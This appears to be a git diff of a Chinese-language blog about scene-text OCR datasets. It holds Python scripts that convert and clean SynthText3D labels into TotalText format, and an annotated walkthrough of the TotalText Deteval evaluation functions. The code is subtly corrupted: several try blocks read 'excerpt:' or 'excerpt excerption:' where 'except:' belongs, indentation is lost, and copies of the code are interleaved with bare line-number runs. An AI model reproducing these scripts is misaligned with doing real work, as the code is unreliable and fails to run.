      save_dir = r"E:\dataset\Synth3D-10K\Txts"

      for index in tqdm(range(1, 10000 + 1)):
      label_path = os.path.join(label_dir, str(index) + '.txt')

      with open(label_path, "r") as file:
      data = file.read()

      lines = data.split("\n") # 按行分割文本
      result = []
      for line in lines:
      if len(line) > 1:
      values = line.split(",") # 按逗号分割字符串
      result.extend([float(s) for s in values])

      x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
      y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

      string = ""

      for i in range(len(x_list)):
      x = x_list[i]
      y = y_list[i]
      points = np.array([x, y], np.int32).T

      string += 'x: [['
      string += ' '.join(map(str, x))
      string += ']], y: [['
      string += ' '.join(map(str, y))
      string += "]], ornt: [u'h"
      string += "'], transcriptions: [u'"
      string += "#"
      string += "']\n"
      with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
      file.write(string)
      +
      1
      2
      3
      4
      5
      6
      7
      import os
      from tqdm import tqdm

      file_dir = r"E:\dataset\Synth3D-10K\Images\\"

      for file in tqdm(os.listdir(file_dir)):
      os.rename(os.path.join(file_dir, file), os.path.join(file_dir, "img" + file))

      保存可视化结果(TotalText 形式)

      -
      import numpy as np
      import cv2
      import os
      import matplotlib.pyplot as plt
      from shapely.geometry import Polygon
      from tqdm import tqdm

      image_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train\\'
      label_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
      save_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train3\\'

      for index in tqdm(range(1, 10001)):
      image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
      label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

      image_origin = cv2.imread(image_path)
      image = image_origin.copy()
      height, width, _ = image.shape
      try:
      label_file = open(label_path, 'r')
      excerpt:
      continue
      annotations = label_file.readlines()
      label_file.close()

      for annotation in annotations:
      x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
      y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
      ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]

      points = np.array([x, y], np.int32).T

      cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
      for p in points:
      cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)


      cv2.imwrite(os.path.join(save_dir, str(index) + '.jpg'), image)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      import numpy as np
      import cv2
      import os
      import matplotlib.pyplot as plt
      from shapely.geometry import Polygon
      from tqdm import tqdm

      image_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train\\'
      label_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
      save_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train3\\'

      for index in tqdm(range(1, 10001)):
      image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
      label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

      image_origin = cv2.imread(image_path)
      image = image_origin.copy()
      height, width, _ = image.shape
      try:
      label_file = open(label_path, 'r')
      excerpt:
      continue
      annotations = label_file.readlines()
      label_file.close()

      for annotation in annotations:
      x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
      y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
      ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]

      points = np.array([x, y], np.int32).T

      cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
      for p in points:
      cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)


      cv2.imwrite(os.path.join(save_dir, str(index) + '.jpg'), image)

      清洗数据

      ​ 果然里面错误的数据太多,放到 mindOCR 里直接跑不动,让我怀疑这篇论文是不是有点问题,还得洗一洗:

      ​ 去除注释中:

      @@ -676,7 +674,7 @@

      ​ 的数据,勉强能跑。

      ​ 还有些数据错的更复杂,算了能跑就行吧。

      -
      import numpy as np
      import cv2
      import os
      import matplotlib.pyplot as plt
      from shapely.geometry import Polygon
      from tqdm import tqdm


      def check_intersection(rectangle, rectangle_list):
      for other_rectangle in rectangle_list:
      if rectangle != other_rectangle:
      other_polygon = Polygon(other_rectangle)

      if polygon.intersects(other_polygon):
      return True

      return False


      image_dir = r'F:\dataset\Synth3D-10K\img\\'
      label_dir = r'F:\dataset\Synth3D-10K\label\\'
      save_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
      error_list = []

      for index in range(1, 10000 + 1):
      image_path = os.path.join(image_dir, str(index) + '.jpg')
      label_path = os.path.join(label_dir, str(index) + '.txt')

      image_origin = cv2.imread(image_path)
      image = image_origin.copy()
      height, width, _ = image.shape

      with open(label_path, "r") as file:
      data = file.read()

      lines = data.split("\n") # 按行分割文本
      result = []
      for line in lines:
      if len(line) > 1:
      values = line.split(",") # 按逗号分割字符串
      result.extend([float(s) for s in values])

      x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
      y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]
      points_list = []
      is_error = False

      for i in range(len(x_list)):
      x = x_list[i]
      y = y_list[i]
      points_list.append(Polygon(np.array([x, y], np.int32).T))

      if not is_error:
      string = ""
      for i in range(len(x_list)):
      x = list(map(int, x_list[i]))
      y = list(map(int, y_list[i]))

      polygon = Polygon(np.array([x, y], np.int32).T)

      if polygon.area < 200:
      is_error = True
      error_list.append(index)
      print(index, "四边形太小", polygon.area)
      continue

      if not (polygon.is_valid and len(polygon.exterior.coords) == 5):
      is_error = True
      error_list.append(index)
      print(index, "不构成四边形")
      continue

      if min(y) < 0 or min(x) < 0 or max(x) > width or max(y) > height:
      is_error = True
      error_list.append(index)
      print(index, "越界")
      continue

      if check_intersection(polygon, points_list):
      is_error = True
      error_list.append(index)
      print(index, "相交", polygon.area)
      continue

      string += 'x: [['
      string += ' '.join(map(str, x))
      string += ']], y: [['
      string += ' '.join(map(str, y))
      string += "]], ornt: [u'h"
      string += "'], transcriptions: [u'"
      string += "A"
      string += "']\n"
      if len(string) > 0:
      print("写入", index)
      with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
      file.write(string)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      81
      82
      83
      84
      85
      86
      87
      88
      89
      90
      91
      92
      93
      94
      95
      96
      import numpy as np
      import cv2
      import os
      import matplotlib.pyplot as plt
      from shapely.geometry import Polygon
      from tqdm import tqdm


      def check_intersection(rectangle, rectangle_list):
      for other_rectangle in rectangle_list:
      if rectangle != other_rectangle:
      other_polygon = Polygon(other_rectangle)

      if polygon.intersects(other_polygon):
      return True

      return False


      image_dir = r'F:\dataset\Synth3D-10K\img\\'
      label_dir = r'F:\dataset\Synth3D-10K\label\\'
      save_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
      error_list = []

      for index in range(1, 10000 + 1):
      image_path = os.path.join(image_dir, str(index) + '.jpg')
      label_path = os.path.join(label_dir, str(index) + '.txt')

      image_origin = cv2.imread(image_path)
      image = image_origin.copy()
      height, width, _ = image.shape

      with open(label_path, "r") as file:
      data = file.read()

      lines = data.split("\n") # 按行分割文本
      result = []
      for line in lines:
      if len(line) > 1:
      values = line.split(",") # 按逗号分割字符串
      result.extend([float(s) for s in values])

      x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
      y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]
      points_list = []
      is_error = False

      for i in range(len(x_list)):
      x = x_list[i]
      y = y_list[i]
      points_list.append(Polygon(np.array([x, y], np.int32).T))

      if not is_error:
      string = ""
      for i in range(len(x_list)):
      x = list(map(int, x_list[i]))
      y = list(map(int, y_list[i]))

      polygon = Polygon(np.array([x, y], np.int32).T)

      if polygon.area < 200:
      is_error = True
      error_list.append(index)
      print(index, "四边形太小", polygon.area)
      continue

      if not (polygon.is_valid and len(polygon.exterior.coords) == 5):
      is_error = True
      error_list.append(index)
      print(index, "不构成四边形")
      continue

      if min(y) < 0 or min(x) < 0 or max(x) > width or max(y) > height:
      is_error = True
      error_list.append(index)
      print(index, "越界")
      continue

      if check_intersection(polygon, points_list):
      is_error = True
      error_list.append(index)
      print(index, "相交", polygon.area)
      continue

      string += 'x: [['
      string += ' '.join(map(str, x))
      string += ']], y: [['
      string += ' '.join(map(str, y))
      string += "]], ornt: [u'h"
      string += "'], transcriptions: [u'"
      string += "A"
      string += "']\n"
      if len(string) > 0:
      print("写入", index)
      with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
      file.write(string)
      @@ -894,6 +892,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Synthetic Data for Deep Learning/index.html b/posts/Paper-Synthetic Data for Deep Learning/index.html index a3d67c3e8c..311de31fc2 100644 --- a/posts/Paper-Synthetic Data for Deep Learning/index.html +++ b/posts/Paper-Synthetic Data for Deep Learning/index.html @@ -44,8 +44,6 @@ - - @@ -1029,6 +1027,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Synthetic Data for Text Localisation in Natural Images/index.html b/posts/Paper-Synthetic Data for Text Localisation in Natural Images/index.html index 8ed2d5e141..d35ad920af 100644 --- a/posts/Paper-Synthetic Data for Text Localisation in Natural Images/index.html +++ b/posts/Paper-Synthetic Data for Text Localisation in Natural Images/index.html @@ -44,8 +44,6 @@ - - @@ -468,9 +466,9 @@

      笔记

    代码

    这个项目好像有点旧,像是用 python 2.x 写的……结果我还是装了一个 3.9 的环境,结果代码改半天 orz

    -
    conda create -n SynthText python=3.9
    +
    1
    conda create -n SynthText python=3.9

    然后一阵乱装:

    -
    pygame==2.0.0, opencv (cv2), PIL (Image), numpy, matplotlib, h5py, scipy
    +
    1
    pygame==2.0.0, opencv (cv2), PIL (Image), numpy, matplotlib, h5py, scipy

    Synthetic Data for Text Localisation in Natural Images - Academic Torrents下载一些必要的文件


    我说婷婷!没注意README.md里这句话:

    @@ -698,6 +696,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Synthetic Image Data for Deep Learning/index.html b/posts/Paper-Synthetic Image Data for Deep Learning/index.html index b35645cc8d..a6b887116f 100644 --- a/posts/Paper-Synthetic Image Data for Deep Learning/index.html +++ b/posts/Paper-Synthetic Image Data for Deep Learning/index.html @@ -44,8 +44,6 @@ - - @@ -728,6 +726,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild/index.html b/posts/Paper-Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild/index.html index 9504781cf2..395ed3c4bb 100644 --- a/posts/Paper-Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild/index.html +++ b/posts/Paper-Synthetic-to-Real Unsupervised Domain Adaptation for Scene Text Detection in the Wild/index.html @@ -44,8 +44,6 @@ - - @@ -770,6 +768,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Text Recognition in the Wild-A Survey/index.html b/posts/Paper-Text Recognition in the Wild-A Survey/index.html index 617ef204c2..69801060f4 100644 --- a/posts/Paper-Text Recognition in the Wild-A Survey/index.html +++ b/posts/Paper-Text Recognition in the Wild-A Survey/index.html @@ -44,8 +44,6 @@ - - @@ -1002,6 +1000,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-TotalText/index.html b/posts/Paper-TotalText/index.html index 463cf27469..9bc7b113c7 100644 --- a/posts/Paper-TotalText/index.html +++ b/posts/Paper-TotalText/index.html @@ -44,8 +44,6 @@ - - @@ -759,11 +757,11 @@

    Deteval

    • 定义
    -
    from os import listdir
    from scipy import io
    import numpy as np
    # mask counting version
    # from polygon_wrapper import iod
    # from polygon_wrapper import area_of_intersection
    # from polygon_wrapper import area

    # polygon based version
    from polygon_fast import iod
    from polygon_fast import area_of_intersection
    from polygon_fast import area
    from tqdm import tqdm

    try: # python2
    range = xrange
    excerpt excerption:
    # python3
    range = range

    """
    Input format: y0,x0, ..... yn,xn. Each detection is separated by the end of line token ('\n')'
    """

    input_dir = '../Examples/Prediction/' #detection directory goes here
    gt_dir = '../Examples/Groundtruth/' #gt directory goes here
    fid_path = '../Examples/' #output text file directory goes here

    allInputs = listdir(input_dir)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    from os import listdir
    from scipy import io
    import numpy as np
    # mask counting version
    # from polygon_wrapper import iod
    # from polygon_wrapper import area_of_intersection
    # from polygon_wrapper import area

    # polygon based version
    from polygon_fast import iod
    from polygon_fast import area_of_intersection
    from polygon_fast import area
    from tqdm import tqdm

    try: # python2
    range = xrange
    excerpt excerption:
    # python3
    range = range

    """
    Input format: y0,x0, ..... yn,xn. Each detection is separated by the end of line token ('\n')'
    """

    input_dir = '../Examples/Prediction/' #detection directory goes here
    gt_dir = '../Examples/Groundtruth/' #gt directory goes here
    fid_path = '../Examples/' #output text file directory goes here

    allInputs = listdir(input_dir)
    • def input_reading_mod()
    -
    def input_reading_mod(input_dir, input):
    """This helper reads input from txt files"""
    with open('%s/%s' % (input_dir, input), 'r', encoding='latin-1') as input_fid:
    pred = input_fid.readlines()
    det = [x.strip('\n') for x in pred]
    return det
    +
    1
    2
    3
    4
    5
    6
    def input_reading_mod(input_dir, input):
    """This helper reads input from txt files"""
    with open('%s/%s' % (input_dir, input), 'r', encoding='latin-1') as input_fid:
    pred = input_fid.readlines()
    det = [x.strip('\n') for x in pred]
    return det

    这是一个名为 input_reading_mod 的函数定义,它用于从文本文件中读取输入。

    函数的输入参数包括 input_dir input,分别表示输入目录和要读取的文件名。

    @@ -774,7 +772,7 @@

    Deteval

    • gt_reading_mod()
    -
    def gt_reading_mod(gt_dir, gt_id):
    """This helper reads groundtruths from mat files"""
    gt_id = gt_id.split('.')[0]
    gt = io.loadmat('%s/poly_gt_%s.mat' % (gt_dir, gt_id))
    gt = gt['polygt']
    return gt
    +
    1
    2
    3
    4
    5
    6
    def gt_reading_mod(gt_dir, gt_id):
    """This helper reads groundtruths from mat files"""
    gt_id = gt_id.split('.')[0]
    gt = io.loadmat('%s/poly_gt_%s.mat' % (gt_dir, gt_id))
    gt = gt['polygt']
    return gt

    这是一个名为 gt_reading_mod 的函数定义,它用于从 .mat 文件中读取标注数据。

    函数的输入参数包括 gt_dirgt_id,分别表示标注目录和要读取的文件名。

    @@ -786,7 +784,7 @@

    Deteval

    • detection_filtering()
    -
    def detection_filtering(detections, groundtruths, threshold=0.5):
    for gt_id, gt in enumerate(groundtruths):
    if (gt[5] == '#') and (gt[1].shape[1] > 1):
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
    if det_gt_iou > threshold:
    detections[det_id] = []

    detections[:] = [item for item in detections if item != []]
    return detections
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    def detection_filtering(detections, groundtruths, threshold=0.5):
    for gt_id, gt in enumerate(groundtruths):
    if (gt[5] == '#') and (gt[1].shape[1] > 1):
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
    if det_gt_iou > threshold:
    detections[det_id] = []

    detections[:] = [item for item in detections if item != []]
    return detections

    这是一个名为 detection_filtering 的函数定义,用于过滤掉与标注数据重叠度低的检测结果。

    函数的输入参数包括 detectionsgroundtruths,分别表示检测结果和标注数据。另外还有一个可选参数 threshold,表示重叠度的阈值,默认为 0.5。

    @@ -799,12 +797,12 @@

    Deteval

    • sigma_calculation()
    -
    def sigma_calculation(det_x, det_y, gt_x, gt_y):
    """
    sigma = inter_area / gt_area
    """
    # print(area_of_intersection(det_x, det_y, gt_x, gt_y))
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(gt_x, gt_y)), 2)
    +
    1
    2
    3
    4
    5
    6
    def sigma_calculation(det_x, det_y, gt_x, gt_y):
    """
    sigma = inter_area / gt_area
    """
    # print(area_of_intersection(det_x, det_y, gt_x, gt_y))
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(gt_x, gt_y)), 2)

    这是一个名为 sigma_calculation 的函数定义,用于计算检测结果与标注数据之间的重叠度。

    函数的输入参数包括 det_xdet_ygt_xgt_y,分别表示检测结果和标注数据的顶点坐标。

    函数的功能是根据以下公式计算重叠度(sigma):

    -
    sigma = inter_area / gt_area
    +
    1
    sigma = inter_area / gt_area

    其中,inter_area 表示检测结果与标注数据之间的交集区域面积,gt_area 表示标注数据的区域面积。

    函数内部通过调用两个辅助函数 area_of_intersectionarea 来计算交集区域面积和标注数据区域面积。然后将交集区域面积除以标注数据区域面积,并使用 np.round 函数将结果四舍五入到小数点后两位。

    最后,函数返回计算得到的重叠度作为输出结果。

    @@ -812,12 +810,12 @@

    Deteval

    • tau_calculation()
    -
    def tau_calculation(det_x, det_y, gt_x, gt_y):
    """
    tau = inter_area / det_area
    """
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(det_x, det_y)), 2)
    +
    1
    2
    3
    4
    5
    def tau_calculation(det_x, det_y, gt_x, gt_y):
    """
    tau = inter_area / det_area
    """
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(det_x, det_y)), 2)

    这是一个名为 tau_calculation 的函数定义,用于计算检测结果与标注数据之间的重叠度。

    函数的输入参数包括 det_xdet_ygt_xgt_y,分别表示检测结果和标注数据的顶点坐标。

    函数的功能是根据以下公式计算重叠度(tau):

    -
    tau = inter_area / det_area
    +
    1
    tau = inter_area / det_area

    其中,inter_area 表示检测结果与标注数据之间的交集区域面积,det_area 表示检测结果的区域面积。

    函数内部通过调用两个辅助函数 area_of_intersectionarea 来计算交集区域面积和检测结果区域面积。然后将交集区域面积除以检测结果区域面积,并使用 np.round 函数将结果四舍五入到小数点后两位。

    最后,函数返回计算得到的重叠度作为输出结果。

    @@ -825,7 +823,7 @@

    Deteval

    • 变量定义
    -
    global_tp = 0
    global_fp = 0
    global_fn = 0
    global_sigma = []
    global_tau = []
    tr = 0.7
    tp = 0.6
    fsc_k = 0.8
    k = 2
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    global_tp = 0
    global_fp = 0
    global_fn = 0
    global_sigma = []
    global_tau = []
    tr = 0.7
    tp = 0.6
    fsc_k = 0.8
    k = 2

    这段代码定义了一些全局变量 global_tpglobal_fpglobal_fnglobal_sigmaglobal_tau,并给它们分别赋初值0和空列表。

    其中,global_tp 表示全局的真正例数量(True Positive),global_fp 表示全局的假正例数量(False Positive),global_fn 表示全局的假负例数量(False Negative),global_sigma 表示全局的重叠度(sigma)列表,global_tau 表示全局的重叠度(tau)列表。

    @@ -835,7 +833,7 @@

    Deteval

    • 评估
    -
    for input_id in tqdm(allInputs):
    if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
    input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
    and (input_id != 'Deteval_result_non_curved.txt'):
    # print(input_id)
    detections = input_reading_mod(input_dir, input_id)
    groundtruths = gt_reading_mod(gt_dir, input_id)
    detections = detection_filtering(detections, groundtruths) # filters detections overlapping with DC area
    dc_id = np.where(groundtruths[:, 5] == '#')
    groundtruths = np.delete(groundtruths, (dc_id), (0))

    local_sigma_table = np.zeros((groundtruths.shape[0], len(detections)))
    local_tau_table = np.zeros((groundtruths.shape[0], len(detections)))

    for gt_id, gt in enumerate(groundtruths):
    if len(detections) > 0:
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))

    local_sigma_table[gt_id, det_id] = sigma_calculation(det_x, det_y, gt_x, gt_y)
    local_tau_table[gt_id, det_id] = tau_calculation(det_x, det_y, gt_x, gt_y)

    global_sigma.append(local_sigma_table)
    global_tau.append(local_tau_table)

    global_accumulative_recall = 0
    global_accumulative_precision = 0
    total_num_gt = 0
    total_num_det = 0
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    for input_id in tqdm(allInputs):
    if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
    input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
    and (input_id != 'Deteval_result_non_curved.txt'):
    # print(input_id)
    detections = input_reading_mod(input_dir, input_id)
    groundtruths = gt_reading_mod(gt_dir, input_id)
    detections = detection_filtering(detections, groundtruths) # filters detections overlapping with DC area
    dc_id = np.where(groundtruths[:, 5] == '#')
    groundtruths = np.delete(groundtruths, (dc_id), (0))

    local_sigma_table = np.zeros((groundtruths.shape[0], len(detections)))
    local_tau_table = np.zeros((groundtruths.shape[0], len(detections)))

    for gt_id, gt in enumerate(groundtruths):
    if len(detections) > 0:
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))

    local_sigma_table[gt_id, det_id] = sigma_calculation(det_x, det_y, gt_x, gt_y)
    local_tau_table[gt_id, det_id] = tau_calculation(det_x, det_y, gt_x, gt_y)

    global_sigma.append(local_sigma_table)
    global_tau.append(local_tau_table)

    global_accumulative_recall = 0
    global_accumulative_precision = 0
    total_num_gt = 0
    total_num_det = 0

    这段代码通过一个 for 循环遍历名为 allInputs 的列表中的每个元素 input_id

    在循环内部,首先使用一系列条件语句来过滤掉一些特定的 input_id,包括 .DS_StorePascal_result.txt 等等。然后调用 input_reading_mod 函数从 input_dir 目录中读取输入数据,调用 gt_reading_mod 函数从 gt_dir 目录中读取标注数据。

    @@ -848,7 +846,7 @@

    Deteval

    • one_to_one()
    -
    def one_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for gt_id in range(num_gt):
    gt_matching_qualified_sigma_candidates = np.where(local_sigma_table[gt_id, :] > tr)
    gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[0].shape[0]
    gt_matching_qualified_tau_candidates = np.where(local_tau_table[gt_id, :] > tp)
    gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[0].shape[0]

    det_matching_qualified_sigma_candidates = np.where(local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]] > tr)
    det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[0].shape[0]
    det_matching_qualified_tau_candidates = np.where(local_tau_table[:, gt_matching_qualified_tau_candidates[0]] > tp)
    det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[0].shape[0]


    if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
    (det_matching_num_qualified_sigma_candidates == 1) and (det_matching_num_qualified_tau_candidates == 1):
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, gt_id] = 1
    matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
    det_flag[0, matched_det_id] = 1
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    def one_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for gt_id in range(num_gt):
    gt_matching_qualified_sigma_candidates = np.where(local_sigma_table[gt_id, :] > tr)
    gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[0].shape[0]
    gt_matching_qualified_tau_candidates = np.where(local_tau_table[gt_id, :] > tp)
    gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[0].shape[0]

    det_matching_qualified_sigma_candidates = np.where(local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]] > tr)
    det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[0].shape[0]
    det_matching_qualified_tau_candidates = np.where(local_tau_table[:, gt_matching_qualified_tau_candidates[0]] > tp)
    det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[0].shape[0]


    if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
    (det_matching_num_qualified_sigma_candidates == 1) and (det_matching_num_qualified_tau_candidates == 1):
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, gt_id] = 1
    matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
    det_flag[0, matched_det_id] = 1
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 one_to_one 的函数,它接受多个参数,包括 local_sigma_tablelocal_tau_tablelocal_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    函数中的 for 循环遍历从 0 到 num_gt 的每个 gt_id,其中 num_gt 是标注数据的数量。

    @@ -860,7 +858,7 @@

    Deteval

    • one_to_many()
    -
    def one_to_many(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for gt_id in range(num_gt):
    #skip the following if the groundtruth was matched
    if gt_flag[0, gt_id] > 0:
    continue

    non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
    num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]

    if num_non_zero_in_sigma >= k:
    ####search for all detections that overlaps with this groundtruth
    qualified_tau_candidates = np.where((local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0))
    num_qualified_tau_candidates = qualified_tau_candidates[0].shape[0]

    if num_qualified_tau_candidates == 1:
    if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp) and (local_sigma_table[gt_id, qualified_tau_candidates] >= tr)):
    #became an one-to-one case
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, gt_id] = 1
    det_flag[0, qualified_tau_candidates] = 1
    elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr):
    gt_flag[0, gt_id] = 1
    det_flag[0, qualified_tau_candidates] = 1

    global_accumulative_recall = global_accumulative_recall + fsc_k
    global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k

    local_accumulative_recall = local_accumulative_recall + fsc_k
    local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k

    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    def one_to_many(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for gt_id in range(num_gt):
    #skip the following if the groundtruth was matched
    if gt_flag[0, gt_id] > 0:
    continue

    non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
    num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]

